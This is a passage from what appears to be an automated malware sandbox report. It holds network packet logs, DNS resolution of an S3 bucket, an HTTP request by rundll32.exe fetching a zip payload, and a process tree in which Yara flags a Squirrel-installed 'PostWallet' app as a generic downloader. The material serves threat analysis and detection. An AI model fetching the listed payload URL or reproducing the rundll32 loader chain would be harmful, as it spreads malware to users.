                                        Mar 7, 2024 10:36:11.479873896 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479895115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479924917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479929924 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479943037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479950905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479959011 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.479965925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.479996920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.480006933 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.480012894 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.830264091 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.830288887 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.830300093 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.830326080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.830347061 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.159742117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.159866095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160041094 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160041094 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160073042 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160501003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160523891 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160547972 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160579920 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160605907 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160610914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160636902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160670996 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160696030 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160744905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160803080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160830021 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.160849094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.160876036 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.161088943 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.162604094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.162664890 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.162695885 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.162713051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.162735939 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.162754059 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.163445950 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.163511992 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.163532019 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.163544893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.163573027 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.163592100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.164854050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.164910078 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.164942980 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.164954901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.164984941 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.165236950 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.487505913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.487539053 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.487587929 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.487675905 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.487761974 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.487801075 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.487823963 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.488358021 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.488416910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.488449097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.488464117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.488492012 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.488511086 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.489737034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.489789963 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.489931107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.489945889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.490384102 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.490434885 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.490466118 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.490482092 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.490511894 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.490528107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.491724014 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.491767883 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.491847038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.491859913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.492490053 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.492537022 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.492564917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.492577076 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.492610931 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.494247913 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815051079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815115929 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815193892 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815242052 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815279007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815504074 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815557003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815574884 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815597057 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.815628052 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.815649986 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816203117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816271067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816279888 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816298008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816343069 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816343069 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816421032 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816477060 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816498041 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816513062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816540003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816557884 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816829920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816879034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816899061 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816916943 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.816945076 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.816963911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.817558050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.817600012 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.817631960 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.817645073 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.817670107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.817686081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.818264008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.818315029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.818342924 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.818355083 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.818386078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.818406105 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.819236994 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.819278955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.819314003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.819324970 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.819353104 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.819370031 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820058107 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820101976 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820138931 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820152044 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820183039 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820203066 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820772886 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820818901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820858955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.820871115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.820904016 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.821491003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.821537971 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.821563959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.821577072 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.821607113 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.821624994 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.822520018 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.822568893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.822616100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.822633028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.822660923 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.823535919 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.823580980 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.823613882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.823626041 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.823653936 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.823674917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.824181080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.824240923 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.824246883 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.824265003 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.824302912 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.824328899 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.825315952 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.825357914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.825398922 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.825409889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:12.825438976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:12.825458050 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.145068884 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.145138979 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.145168066 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.145236969 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.145282030 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.145282030 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.146301031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.146373034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.146392107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.146406889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.146435022 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.146456003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.147195101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.147259951 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.147274971 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.147289038 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.147320986 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.147337914 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.148258924 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.148305893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.148332119 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.148344040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.148382902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.148382902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.149365902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.149415016 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.149437904 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.149450064 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.149485111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.149485111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.150372028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.150420904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.150444984 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.150461912 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.150484085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.150484085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.150510073 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.151216030 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.151268005 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.151295900 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.151308060 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.151335001 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.151351929 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.152090073 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.152139902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.152172089 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.152183056 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.152211905 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.152256966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153214931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153258085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153289080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153300047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153325081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153345108 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153616905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153657913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153690100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153701067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153724909 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153742075 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153778076 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153829098 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153846025 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153857946 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.153882980 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.153903008 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.154412031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.154465914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.154483080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.154494047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.154530048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.154530048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.154601097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:13.154652119 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.177697897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:13.177767992 CET4434972916.12.1.14192.168.2.4
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Mar 7, 2024 10:36:06.706239939 CET | 49499 | 53 | 192.168.2.4 | 1.1.1.1
                                        Mar 7, 2024 10:36:06.913742065 CET | 53 | 49499 | 1.1.1.1 | 192.168.2.4

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Mar 7, 2024 10:36:06.706239939 CET | 192.168.2.4 | 1.1.1.1 | 0xcb18 | Standard query (0) | bucreate203920233.s3.sa-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | bucreate203920233.s3.sa-east-1.amazonaws.com | s3-r-w.sa-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.14 | A (IP address) | IN (0x0001) | false
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.232.201 | A (IP address) | IN (0x0001) | false
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.30 | A (IP address) | IN (0x0001) | false
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.0.18 | A (IP address) | IN (0x0001) | false
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.234.15 | A (IP address) | IN (0x0001) | false
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.232.185 | A (IP address) | IN (0x0001) | false
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.0.62 | A (IP address) | IN (0x0001) | false
                                        Mar 7, 2024 10:36:06.913742065 CET | 1.1.1.1 | 192.168.2.4 | 0xcb18 | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.58 | A (IP address) | IN (0x0001) | false
                                        • bucreate203920233.s3.sa-east-1.amazonaws.com
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.4 | 49729 | 16.12.1.14 | 443 | 7080 | C:\Windows\System32\rundll32.exe

                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-03-07 09:36:08 UTC | 336 | OUT | GET /bucketTc.zip HTTP/1.1
                                        Accept: */*
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: bucreate203920233.s3.sa-east-1.amazonaws.com
                                        Connection: Keep-Alive
                                        2024-03-07 09:36:08 UTC | 423 | IN | HTTP/1.1 200 OK
                                        x-amz-id-2: gyUr0PILlOmdnJindTeRa3bpY/CY6Vsse3m9G/Vv5uXrFe6vJriNL1YpVf/DGkVFjEu1pXxDUzA=
                                        x-amz-request-id: B8T3D388MQA8FFY9
                                        Date: Thu, 07 Mar 2024 09:36:09 GMT
                                        Last-Modified: Wed, 06 Mar 2024 05:27:41 GMT
                                        ETag: "b952a1b57aae836929b07ee6b6306c61"
                                        x-amz-server-side-encryption: AES256
                                        Accept-Ranges: bytes
                                        Content-Type: application/zip
                                        Server: AmazonS3
                                        Content-Length: 7426462
                                        Connection: close



                                        Target ID:0
                                        Start time:10:35:57
                                        Start date:07/03/2024
                                        Path:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        Imagebase:0x610000
                                        File size:6'569'472 bytes
                                        MD5 hash:9E1E30202D950CE1F273EB2E8492F39B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:10:35:57
                                        Start date:07/03/2024
                                        Path:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC
                                        Imagebase:0x610000
                                        File size:6'569'472 bytes
                                        MD5 hash:9E1E30202D950CE1F273EB2E8492F39B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:10:35:58
                                        Start date:07/03/2024
                                        Path:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
                                        Imagebase:0x2a0000
                                        File size:1'899'520 bytes
                                        MD5 hash:A560BAD9E373EA5223792D60BEDE2B13
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:10:36:00
                                        Start date:07/03/2024
                                        Path:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
                                        Imagebase:0x340000
                                        File size:89'392 bytes
                                        MD5 hash:436CEDFA08F245AD52DD221BEC4480A4
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:4
                                        Start time:10:36:00
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:7
                                        Start time:10:36:02
                                        Start date:07/03/2024
                                        Path:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe"
                                        Imagebase:0x340000
                                        File size:89'392 bytes
                                        MD5 hash:436CEDFA08F245AD52DD221BEC4480A4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:8
                                        Start time:10:36:02
                                        Start date:07/03/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:9
                                        Start time:10:36:04
                                        Start date:07/03/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
